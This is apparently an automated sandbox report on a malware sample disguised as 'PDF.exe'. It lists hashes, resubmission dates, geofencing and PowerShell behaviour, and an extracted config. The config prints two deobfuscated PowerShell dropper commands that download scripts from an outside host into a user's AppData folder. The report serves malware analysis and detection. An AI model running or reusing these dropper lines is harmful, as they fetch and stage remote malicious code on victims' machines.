Resubmissions

21/01/2025, 13:31 UTC

250121-qspexswjes 10

21/01/2025, 12:04 UTC

250121-n8tngasrhm 10

13/07/2024, 12:59 UTC

240713-p8a2ss1gpq 10

General

  • Target

    PDF.exe

  • Size

    258KB

  • Sample

    250121-n8tngasrhm

  • MD5

    34c2047d0b69ba023b700c21431accc0

  • SHA1

    e34c28611707c81565cb73d8a1a46dfc3ab2495a

  • SHA256

    ff9b39d07fd6e4a7f98d109664d91de9e318671da6412da85396541722d92799

  • SHA512

    a1566d65beb8135edfcb5c4a09631bc17dff56db672621990a10d0eff37a0290c7e1e9705f1918a7e719cbea4b1cecc29bb8254da946108e9bd5432070cc8ca7

  • SSDEEP

    6144:VbJhs7QW69hd1MMdxPe9N9uA0hu9TBrjJ0Xxne0AqGLj:VbjDhu9TV6xeJqG3

Malware Config

Extracted

Language: ps1

Deobfuscated:

    (new-object net.webclient).downloadfile("http://thelustfactory.com/vns/1.ps1", "C:\\Users\\Admin\\AppData\\Roaming\\1.ps1")

URLs (exe.dropper):

    http://thelustfactory.com/vns/1.ps1

Extracted

Language: ps1

Deobfuscated:

    (new-object net.webclient).downloadfile("http://thelustfactory.com/vns/2.ps1", "C:\\Users\\Admin\\AppData\\Roaming\\2.ps1")

URLs (exe.dropper):

    http://thelustfactory.com/vns/2.ps1

Targets

    • Target

      PDF.exe

    • Size

      258KB

    • MD5

      34c2047d0b69ba023b700c21431accc0

    • SHA1

      e34c28611707c81565cb73d8a1a46dfc3ab2495a

    • SHA256

      ff9b39d07fd6e4a7f98d109664d91de9e318671da6412da85396541722d92799

    • SHA512

      a1566d65beb8135edfcb5c4a09631bc17dff56db672621990a10d0eff37a0290c7e1e9705f1918a7e719cbea4b1cecc29bb8254da946108e9bd5432070cc8ca7

    • SSDEEP

      6144:VbJhs7QW69hd1MMdxPe9N9uA0hu9TBrjJ0Xxne0AqGLj:VbjDhu9TV6xeJqG3

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

MITRE ATT&CK Enterprise v15
